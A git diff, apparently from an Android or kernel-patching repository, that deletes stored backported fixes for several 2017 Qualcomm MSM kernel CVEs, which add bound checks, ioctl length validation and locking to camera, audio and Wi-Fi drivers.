- case AUDIO_EFFECTS_SET_PP_PARAMS: {
-+ mutex_lock(&effects->lock);
- if (copy_from_user(argvalues, (void *)arg,
- MAX_PP_PARAMS_SZ*sizeof(long))) {
- pr_err("%s: copy from user for pp params failed\n",
- __func__);
-+ mutex_unlock(&effects->lock);
- return -EFAULT;
- }
- rc = audio_effects_set_pp_param(effects, argvalues);
-+ mutex_unlock(&effects->lock);
- break;
- }
- default:
-@@ -578,12 +601,14 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- case AUDIO_SET_EFFECTS_CONFIG32: {
- struct msm_hwacc_effects_config32 config32;
- struct msm_hwacc_effects_config *config = &effects->config;
-+ mutex_lock(&effects->lock);
- memset(&effects->config, 0, sizeof(effects->config));
- if (copy_from_user(&config32, (void *)arg,
- sizeof(config32))) {
- pr_err("%s: copy to user for AUDIO_SET_EFFECTS_CONFIG failed\n",
- __func__);
- rc = -EFAULT;
-+ mutex_unlock(&effects->lock);
- break;
- }
- config->input.buf_size = config32.input.buf_size;
-@@ -620,16 +645,19 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- effects->config.input.num_buf,
- effects->config.input.sample_rate,
- effects->config.input.num_channels);
-+ mutex_unlock(&effects->lock);
- break;
- }
- case AUDIO_EFFECTS_SET_BUF_LEN32: {
- struct msm_hwacc_buf_cfg32 buf_cfg32;
- struct msm_hwacc_effects_config *config = &effects->config;
-+ mutex_lock(&effects->lock);
- if (copy_from_user(&buf_cfg32, (void *)arg,
- sizeof(buf_cfg32))) {
- pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n",
- __func__);
- rc = -EFAULT;
-+ mutex_unlock(&effects->lock);
- break;
- }
- config->buf_cfg.input_len = buf_cfg32.input_len;
-@@ -637,6 +665,7 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- pr_debug("%s: write buf len: %d, read buf len: %d\n",
- __func__, effects->config.buf_cfg.output_len,
- effects->config.buf_cfg.input_len);
-+ mutex_unlock(&effects->lock);
- break;
- }
- case AUDIO_EFFECTS_GET_BUF_AVAIL32: {
-@@ -644,6 +673,7 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
-
- memset(&buf_avail, 0, sizeof(buf_avail));
-
-+ mutex_lock(&effects->lock);
- buf_avail.input_num_avail = atomic_read(&effects->in_count);
- buf_avail.output_num_avail = atomic_read(&effects->out_count);
- pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
-@@ -655,22 +685,26 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- __func__);
- rc = -EFAULT;
- }
-+ mutex_unlock(&effects->lock);
- break;
- }
- case AUDIO_EFFECTS_SET_PP_PARAMS32: {
- long argvalues[MAX_PP_PARAMS_SZ] = {0};
- int argvalues32[MAX_PP_PARAMS_SZ] = {0};
-
-+ mutex_lock(&effects->lock);
- if (copy_from_user(argvalues32, (void *)arg,
- MAX_PP_PARAMS_SZ*sizeof(int))) {
- pr_err("%s: copy from user failed for pp params\n",
- __func__);
-+ mutex_unlock(&effects->lock);
- return -EFAULT;
- }
- for (i = 0; i < MAX_PP_PARAMS_SZ; i++)
- argvalues[i] = argvalues32[i];
-
- rc = audio_effects_set_pp_param(effects, argvalues);
-+ mutex_unlock(&effects->lock);
- break;
- }
- case AUDIO_START32: {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11028/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11028/3.18/0001.patch
deleted file mode 100644
index 56ff10b7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11028/3.18/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From a96e06fac09e182b5211f20dd6311f93a5d056af Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal
-Date: Mon, 10 Apr 2017 16:53:33 +0530
-Subject: [PATCH] msm: camera: isp: Initialize stream info
-
-Initialize the Stream info before passing as an
-argument to msm_isp_request_frame and add bound check to the
-stream index
-CRs-fixed: 2008683
-
-Bug: 64453533
-Change-Id: I0039a5d01f4f376060c8b0ba3baf4ce55acc9446
-Signed-off-by: Senthil Kumar Rajagopal
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index 5e0b685aec801..54ab560f09137 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -3488,6 +3488,14 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- case UPDATE_STREAM_REQUEST_FRAMES_VER2: {
- struct msm_vfe_axi_stream_cfg_update_info_req_frm *req_frm =
- &update_cmd->req_frm_ver2;
-+ if (HANDLE_TO_IDX(req_frm->stream_handle) >= VFE_AXI_SRC_MAX) {
-+ pr_err("%s: Invalid stream handle \n", __func__);
-+ rc = -EINVAL;
-+ break;
-+ }
-+ stream_info = &axi_data->stream_info[HANDLE_TO_IDX(
-+ req_frm->stream_handle)];
-+
- rc = msm_isp_request_frame(vfe_dev, stream_info,
- req_frm->user_stream_id,
- req_frm->frame_id,
diff --git a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-11028/ANY/0002.patch
deleted file mode 100644
index e6d4075c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0002.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From fd70b655d901e626403f132b65fc03d993f0a09b Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal
-Date: Mon, 10 Apr 2017 15:11:14 +0530
-Subject: msm: camera: isp: add bound check to handle array out of access
-
-The pointer req_frm comes from userspace,
-req_frm->stream_handle is passed as an argument to
-the function msm_isp_get_stream_common_data,
-stream_idx can overflow common_data->streams[] and
-the code ends up copying an out of bound
-kernel address into stream_info. Adding bound check to
-handle the same.
-
-CRs-fixed: 2008683
-Change-Id: Ib4a059bfd573cdc4e18ce630b4091576ff8edc7e
-Signed-off-by: Senthil Kumar Rajagopal
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c | 6 ++++++
- drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h | 5 +++++
- 2 files changed, 11 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index dce474e..8ab2e85 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -3909,6 +3909,12 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- &update_cmd->req_frm_ver2;
- stream_info = msm_isp_get_stream_common_data(vfe_dev,
- HANDLE_TO_IDX(req_frm->stream_handle));
-+ if (stream_info == NULL) {
-+ pr_err_ratelimited("%s: stream_info is NULL\n",
-+ __func__);
-+ rc = -EINVAL;
-+ break;
-+ }
- rc = msm_isp_request_frame(vfe_dev, stream_info,
- req_frm->user_stream_id,
- req_frm->frame_id,
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h
-index 65009cb..a8d4cfb 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.h
-@@ -141,6 +141,11 @@ static inline struct msm_vfe_axi_stream *msm_isp_get_stream_common_data(
- struct msm_vfe_common_dev_data *common_data = vfe_dev->common_data;
- struct msm_vfe_axi_stream *stream_info;
-
-+ if (stream_idx >= VFE_AXI_SRC_MAX) {
-+ pr_err("invalid stream_idx %d\n", stream_idx);
-+ return NULL;
-+ }
-+
- if (vfe_dev->is_split && stream_idx < RDI_INTF_0)
- stream_info = &common_data->streams[stream_idx];
- else
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-11028/ANY/0003.patch
deleted file mode 100644
index d3e560cc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11028/ANY/0003.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 6724296d3f3b2821b83219768c1b9e971e380a9f Mon Sep 17 00:00:00 2001
-From: Sriraj Hebbar
-Date: Fri, 30 Jun 2017 13:14:28 +0530
-Subject: msm: camera: isp: Handle array out of bound access
-
-The pointer req_frm is coming from userspace, it may overflow stream_info.
-Adding a bound check to prevent the same.
-
-CRs-fixed: 2008683
-Change-Id: I8682e09ff2ab7ba490bbbd9e20db978493c5f3e4
-Signed-off-by: Senthil Kumar Rajagopal
-Signed-off-by: Andy Sun
----
- drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c
-index 373a963..a85ee30 100644
---- a/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/ais/isp/msm_isp_axi_util.c
-@@ -3889,6 +3889,12 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- case UPDATE_STREAM_REQUEST_FRAMES_VER2: {
- struct msm_vfe_axi_stream_cfg_update_info_req_frm *req_frm =
- &update_cmd->req_frm_ver2;
-+ if (HANDLE_TO_IDX(req_frm->stream_handle) >= VFE_AXI_SRC_MAX) {
-+ pr_err("%s: Invalid stream handle\n", __func__);
-+ rc = -EINVAL;
-+ break;
-+ }
-+
- stream_info = &axi_data->stream_info[HANDLE_TO_IDX(
- req_frm->stream_handle)];
- rc = msm_isp_request_frame(vfe_dev, stream_info,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11029/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11029/3.10/0001.patch
deleted file mode 100644
index 1964e92c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11029/3.10/0001.patch
+++ /dev/null
@@ -1,108 +0,0 @@
-From e13a16c079cf8f5c758f5c31fbd72edca2656e54 Mon Sep 17 00:00:00 2001
-From: Jonathan Solnit
-Date: Fri, 1 Sep 2017 17:21:05 -0700
-Subject: [PATCH] msm: camera2: cpp: Fix iommu_attach/detach compat_ioctl issue
-
-When the Camera application exercises the V4L2 ioctl operations, CPP
-driver would attempt to the copy user space buffer contents into the
-internal kernel buffer. If an invalid length of the user space buffer
-is passed onto the driver, it could trigger buffer overflow condition.
-
-Thus, fix this by copying user space buffer contents into kernel space
-buffer of the driver for further processing, only after checking for
-proper length of user space buffer.
-
-Bug: 64433362
-CRs-fixed: 2025367
-Change-Id: I85cf4a961884c7bb0d036299b886044aef7baf7c
-Signed-off-by: Ravi kumar Koyyana
-Signed-off-by: Paresh Purabhiya
-Signed-off-by: Jonathan Solnit
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 23 ++++++++++++++++------
- 1 file changed, 17 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 1dfe7f6abc312..9d7e51c37f486 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2288,11 +2288,13 @@ static void msm_cpp_fw_version(struct cpp_device *cpp_dev)
- msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_TRAILER);
- }
-
--static int msm_cpp_validate_input(unsigned int cmd, void *arg,
-+static int msm_cpp_validate_ioctl_input(unsigned int cmd, void *arg,
- struct msm_camera_v4l2_ioctl_t **ioctl_ptr)
- {
- switch (cmd) {
- case MSM_SD_SHUTDOWN:
-+ case VIDIOC_MSM_CPP_IOMMU_ATTACH:
-+ case VIDIOC_MSM_CPP_IOMMU_DETACH:
- break;
- default: {
- if (ioctl_ptr == NULL) {
-@@ -2301,8 +2303,9 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- }
-
- *ioctl_ptr = arg;
-- if ((*ioctl_ptr == NULL) ||
-- (*ioctl_ptr)->ioctl_ptr == NULL) {
-+ if (((*ioctl_ptr) == NULL) ||
-+ ((*ioctl_ptr)->ioctl_ptr == NULL) ||
-+ ((*ioctl_ptr)->len == 0)) {
- pr_err("Error invalid ioctl argument cmd %u", cmd);
- return -EINVAL;
- }
-@@ -2334,7 +2337,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- return -EINVAL;
- }
-
-- rc = msm_cpp_validate_input(cmd, arg, &ioctl_ptr);
-+ rc = msm_cpp_validate_ioctl_input(cmd, arg, &ioctl_ptr);
- if (rc != 0) {
- pr_err("input validation failed\n");
- return rc;
-@@ -2799,6 +2802,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- pr_err("%s:%dError iommu_attach_device failed\n",
- __func__, __LINE__);
- rc = -EINVAL;
-+ break;
- }
- cpp_dev->iommu_state = CPP_IOMMU_STATE_ATTACHED;
- } else {
-@@ -2813,10 +2817,17 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- (cpp_dev->stream_cnt == 0)) {
- iommu_detach_device(cpp_dev->domain,
- cpp_dev->iommu_ctx);
-+ if (rc < 0) {
-+ pr_err("%s:%dError iommu detach failed\n",
-+ __func__, __LINE__);
-+ rc = -EINVAL;
-+ break;
-+ }
- cpp_dev->iommu_state = CPP_IOMMU_STATE_DETACHED;
- } else {
- pr_err("%s:%d IOMMMU attach triggered in invalid state\n",
- __func__, __LINE__);
-+ rc = -EINVAL;
- }
- break;
- }
-@@ -3422,7 +3433,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- default:
- pr_err_ratelimited("%s: unsupported compat type :%x LOAD %lu\n",
- __func__, cmd, VIDIOC_MSM_CPP_LOAD_FIRMWARE);
-- break;
-+ return -EINVAL;
- }
-
- switch (cmd) {
-@@ -3448,7 +3459,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- default:
- pr_err_ratelimited("%s: unsupported compat type :%d\n",
- __func__, cmd);
-- break;
-+ return -EINVAL;
- }
-
- up32_ioctl.id = kp_ioctl.id;
diff --git a/Patches/Linux_CVEs/CVE-2017-11029/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-11029/3.18/0002.patch
deleted file mode 100644
index 20b8fd68..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11029/3.18/0002.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 74ab23917b82769644a3299da47b58e080aa63f2 Mon Sep 17 00:00:00 2001
-From: Terence Ho
-Date: Fri, 26 May 2017 15:05:07 -0400
-Subject: msm: ais: cpp fix to check zero length ioctl
-
-Port of ioctl validation for zero length ioctl
-from camera_v2.
-
-Change-Id: I635522f331d1e18641196ee3101c64ccc285636a
-CRs-fixed: 2025367
-Signed-off-by: Terence Ho
----
- drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c
-index 0e1c6b4..d265210 100644
---- a/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/ais/pproc/cpp/msm_cpp.c
-@@ -2889,6 +2889,8 @@ static int msm_cpp_validate_ioctl_input(unsigned int cmd, void *arg,
- case MSM_SD_SHUTDOWN:
- case MSM_SD_NOTIFY_FREEZE:
- case MSM_SD_UNNOTIFY_FREEZE:
-+ case VIDIOC_MSM_CPP_IOMMU_ATTACH:
-+ case VIDIOC_MSM_CPP_IOMMU_DETACH:
- break;
- default: {
- if (ioctl_ptr == NULL) {
-@@ -2897,8 +2899,9 @@ static int msm_cpp_validate_ioctl_input(unsigned int cmd, void *arg,
- }
-
- *ioctl_ptr = arg;
-- if ((*ioctl_ptr == NULL) ||
-- (*ioctl_ptr)->ioctl_ptr == NULL) {
-+ if (((*ioctl_ptr) == NULL) ||
-+ ((*ioctl_ptr)->ioctl_ptr == NULL) ||
-+ ((*ioctl_ptr)->len == 0)) {
- pr_err("Error invalid ioctl argument cmd %u", cmd);
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11029/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-11029/4.4/0003.patch
deleted file mode 100644
index e5441156..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11029/4.4/0003.patch
+++ /dev/null
@@ -1,147 +0,0 @@
-From 86f0d207d478e1681f6711b46766cfb3c6a30fb5 Mon Sep 17 00:00:00 2001
-From: Ravi kumar Koyyana
-Date: Mon, 27 Mar 2017 17:44:36 -0700
-Subject: msm: camera2: cpp: Fix iommu_attach/detach compat_ioctl issue
-
-When the Camera application exercises 32-bit version of the V4L2 ioctl
-operation, it results accessing user space memory illegally. This is
-due to the direct access of user space buffer by Camera CPP driver.
-
-Thus, fix this by copying user space buffer contents into kernel space
-buffer of the driver for further processing. Only after checking for
-proper length of user space buffer, proceed further. This will prevent
-the buffer overflow and invalid memory access.
-
-CRs-fixed: 2025367
-Change-Id: I85cf4a961884c7bb0d036299b886044aef7baf7c
-Signed-off-by: Ravi kumar Koyyana
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 49 ++++++++++++++++------
- 1 file changed, 37 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 8402e31..95aac07 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2953,8 +2953,9 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- }
-
- *ioctl_ptr = arg;
-- if ((*ioctl_ptr == NULL) ||
-- ((*ioctl_ptr)->ioctl_ptr == NULL)) {
-+ if (((*ioctl_ptr) == NULL) ||
-+ ((*ioctl_ptr)->ioctl_ptr == NULL) ||
-+ ((*ioctl_ptr)->len == 0)) {
- pr_err("Error invalid ioctl argument cmd %u", cmd);
- return -EINVAL;
- }
-@@ -3503,13 +3504,18 @@ STREAM_BUFF_END:
- if (cpp_dev->iommu_state == CPP_IOMMU_STATE_DETACHED) {
- struct msm_camera_smmu_attach_type cpp_attach_info;
-
-+ if (ioctl_ptr->len !=
-+ sizeof(struct msm_camera_smmu_attach_type)) {
-+ rc = -EINVAL;
-+ break;
-+ }
-+
- memset(&cpp_attach_info, 0, sizeof(cpp_attach_info));
- rc = msm_cpp_copy_from_ioctl_ptr(&cpp_attach_info,
- ioctl_ptr);
- if (rc < 0) {
- pr_err("CPP_IOMMU_ATTACH copy from user fail");
-- ERR_COPY_FROM_USER();
-- return -EINVAL;
-+ break;
- }
-
- cpp_dev->security_mode = cpp_attach_info.attach;
-@@ -3538,16 +3544,20 @@ STREAM_BUFF_END:
- case VIDIOC_MSM_CPP_IOMMU_DETACH: {
- if ((cpp_dev->iommu_state == CPP_IOMMU_STATE_ATTACHED) &&
- (cpp_dev->stream_cnt == 0)) {
--
- struct msm_camera_smmu_attach_type cpp_attach_info;
-
-+ if (ioctl_ptr->len !=
-+ sizeof(struct msm_camera_smmu_attach_type)) {
-+ rc = -EINVAL;
-+ break;
-+ }
-+
- memset(&cpp_attach_info, 0, sizeof(cpp_attach_info));
- rc = msm_cpp_copy_from_ioctl_ptr(&cpp_attach_info,
- ioctl_ptr);
- if (rc < 0) {
- pr_err("CPP_IOMMU_DETTACH copy from user fail");
-- ERR_COPY_FROM_USER();
-- return -EINVAL;
-+ break;
- }
-
- cpp_dev->security_mode = cpp_attach_info.attach;
-@@ -3568,6 +3578,7 @@ STREAM_BUFF_END:
- } else {
- pr_err("%s:%d IOMMMU attach triggered in invalid state\n",
- __func__, __LINE__);
-+ rc = -EINVAL;
- }
- break;
- }
-@@ -3883,6 +3894,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- struct msm_cpp_stream_buff_info_t k_cpp_buff_info;
- struct msm_cpp_frame_info32_t k32_frame_info;
- struct msm_cpp_frame_info_t k64_frame_info;
-+ struct msm_camera_smmu_attach_type kb_cpp_smmu_attach_info;
- uint32_t identity_k = 0;
- bool is_copytouser_req = true;
- void __user *up = (void __user *)arg;
-@@ -4187,11 +4199,23 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- break;
- }
- case VIDIOC_MSM_CPP_IOMMU_ATTACH32:
-- cmd = VIDIOC_MSM_CPP_IOMMU_ATTACH;
-- break;
- case VIDIOC_MSM_CPP_IOMMU_DETACH32:
-- cmd = VIDIOC_MSM_CPP_IOMMU_DETACH;
-+ {
-+ if ((kp_ioctl.len != sizeof(struct msm_camera_smmu_attach_type))
-+ || (copy_from_user(&kb_cpp_smmu_attach_info,
-+ (void __user *)kp_ioctl.ioctl_ptr,
-+ sizeof(kb_cpp_smmu_attach_info)))) {
-+ mutex_unlock(&cpp_dev->mutex);
-+ return -EINVAL;
-+ }
-+
-+ kp_ioctl.ioctl_ptr = (void *)&kb_cpp_smmu_attach_info;
-+ is_copytouser_req = false;
-+ cmd = (cmd == VIDIOC_MSM_CPP_IOMMU_ATTACH32) ?
-+ VIDIOC_MSM_CPP_IOMMU_ATTACH :
-+ VIDIOC_MSM_CPP_IOMMU_DETACH;
- break;
-+ }
- case MSM_SD_NOTIFY_FREEZE:
- break;
- case MSM_SD_UNNOTIFY_FREEZE:
-@@ -4202,7 +4226,8 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- default:
- pr_err_ratelimited("%s: unsupported compat type :%x LOAD %lu\n",
- __func__, cmd, VIDIOC_MSM_CPP_LOAD_FIRMWARE);
-- break;
-+ mutex_unlock(&cpp_dev->mutex);
-+ return -EINVAL;
- }
-
- mutex_unlock(&cpp_dev->mutex);
-@@ -4233,7 +4258,7 @@ static long msm_cpp_subdev_fops_compat_ioctl(struct file *file,
- default:
- pr_err_ratelimited("%s: unsupported compat type :%d\n",
- __func__, cmd);
-- break;
-+ return -EINVAL;
- }
-
- if (is_copytouser_req) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11032/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11032/ANY/0001.patch
deleted file mode 100644
index 117f5efa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11032/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 2720294757d0ad5294283c15dc837852f7b2329a Mon Sep 17 00:00:00 2001
-From: Gaurav Kohli
-Date: Thu, 4 Aug 2016 17:40:15 +0530
-Subject: soc: qcom: Initialize message pointer with NULL
-
-During service locator call there is a chance in which
-resp message is used or freed while uninitialized.So to
-prevent it initialize the same with NULL.
-
-Change-Id: I65f854e184606684ce2ca711f19cf61d26c1ecb5
-Signed-off-by: Gaurav Kohli
----
- drivers/soc/qcom/service-locator.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/soc/qcom/service-locator.c b/drivers/soc/qcom/service-locator.c
-index 76d754d..c204947 100644
---- a/drivers/soc/qcom/service-locator.c
-+++ b/drivers/soc/qcom/service-locator.c
-@@ -202,8 +202,8 @@ static int servreg_loc_send_msg(struct msg_desc *req_desc,
- static int service_locator_send_msg(struct pd_qmi_client_data *pd)
- {
- struct msg_desc req_desc, resp_desc;
-- struct qmi_servreg_loc_get_domain_list_resp_msg_v01 *resp;
-- struct qmi_servreg_loc_get_domain_list_req_msg_v01 *req;
-+ struct qmi_servreg_loc_get_domain_list_resp_msg_v01 *resp = NULL;
-+ struct qmi_servreg_loc_get_domain_list_req_msg_v01 *req = NULL;
- int rc;
- int db_rev_count = 0, domains_read = 0;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11035/qcacld-2.0/0001.patch
deleted file mode 100644
index 511300b0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,72 +0,0 @@
-From cc1896424ae7a346090f601bc69c6ca51d9c3e04 Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal
-Date: Tue, 27 Jun 2017 12:34:21 +0530
-Subject: qcacld-2.0: Add check for set_ft_ies buffer length
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Add check for buffer length in function sme_set_ft_ies.
-
-Change-Id: I7adc56e23316c0ceb193a5bdf8c4c0b5f4fbd20a
-CRs-Fixed: 2070583
----
- CORE/HDD/src/wlan_hdd_wext.c | 4 ++++
- CORE/SME/src/sme_common/sme_FTApi.c | 8 +++-----
- 2 files changed, 7 insertions(+), 5 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 72d499c..562f20f 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -12598,6 +12598,10 @@ static const struct iw_priv_args we_private_args[] = {
- { WE_DUMP_DP_TRACE_LEVEL,
- IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 2,
- 0, "dump_dp_trace"},
-+ {
-+ WLAN_PRIV_SET_FTIES,
-+ IW_PRIV_TYPE_CHAR | MAX_FTIE_SIZE,
-+ 0, "set_ft_ies"},
- };
-
-
-diff --git a/CORE/SME/src/sme_common/sme_FTApi.c b/CORE/SME/src/sme_common/sme_FTApi.c
-index 26a7ef8..16b1f09 100644
---- a/CORE/SME/src/sme_common/sme_FTApi.c
-+++ b/CORE/SME/src/sme_common/sme_FTApi.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -163,6 +163,7 @@ void sme_SetFTIEs(tHalHandle hHal, tANI_U32 sessionId, const tANI_U8 *ft_ies,
- {
- case eFT_START_READY:
- case eFT_AUTH_REQ_READY:
-+ smsLog( pMac, LOG1, FL("ft_ies_length: %d"), ft_ies_length);
- if ((pSession->ftSmeContext.auth_ft_ies) &&
- (pSession->ftSmeContext.auth_ft_ies_length))
- {
-@@ -171,7 +172,7 @@ void sme_SetFTIEs(tHalHandle hHal, tANI_U32 sessionId, const tANI_U8 *ft_ies,
- pSession->ftSmeContext.auth_ft_ies_length = 0;
- pSession->ftSmeContext.auth_ft_ies = NULL;
- }
--
-+ ft_ies_length = MIN(ft_ies_length, MAX_FTIE_SIZE);
- // Save the FT IEs
- pSession->ftSmeContext.auth_ft_ies =
- vos_mem_malloc(ft_ies_length);
-@@ -187,9 +188,6 @@ void sme_SetFTIEs(tHalHandle hHal, tANI_U32 sessionId, const tANI_U8 *ft_ies,
- ft_ies,ft_ies_length);
- pSession->ftSmeContext.FTState = eFT_AUTH_REQ_READY;
-
--#if defined WLAN_FEATURE_VOWIFI_11R_DEBUG
-- smsLog( pMac, LOG1, "ft_ies_length=%d", ft_ies_length);
--#endif
- break;
-
- case eFT_AUTH_COMPLETE:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11035/qcacld-3.0/0002.patch
deleted file mode 100644
index 1e2f4867..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11035/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From c5060da3e741577578d66dfadb7922d853da6156 Mon Sep 17 00:00:00 2001
-From: Naveen Rawat
-Date: Tue, 13 Jun 2017 17:29:51 -0700
-Subject: qcacld-3.0: Add check for set_ft_ies buffer length
-
-Add check for buffer length in function sme_set_ft_ies.
-
-Change-Id: I7adc56e23316c0ceb193a5bdf8c4c0b5f4fbd20a
-CRs-Fixed: 2055659
----
- core/hdd/src/wlan_hdd_wext.c | 5 +++++
- core/sme/src/common/sme_ft_api.c | 4 ++--
- 2 files changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/core/hdd/src/wlan_hdd_wext.c b/core/hdd/src/wlan_hdd_wext.c
-index 637588d..9b35d19 100644
---- a/core/hdd/src/wlan_hdd_wext.c
-+++ b/core/hdd/src/wlan_hdd_wext.c
-@@ -13692,6 +13692,11 @@ static const struct iw_priv_args we_private_args[] = {
- IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
- "hostroamdelay"}
- ,
-+
-+ {WLAN_PRIV_SET_FTIES,
-+ IW_PRIV_TYPE_CHAR | MAX_FTIE_SIZE,
-+ 0,
-+ "set_ft_ies"},
- };
-
- const struct iw_handler_def we_handler_def = {
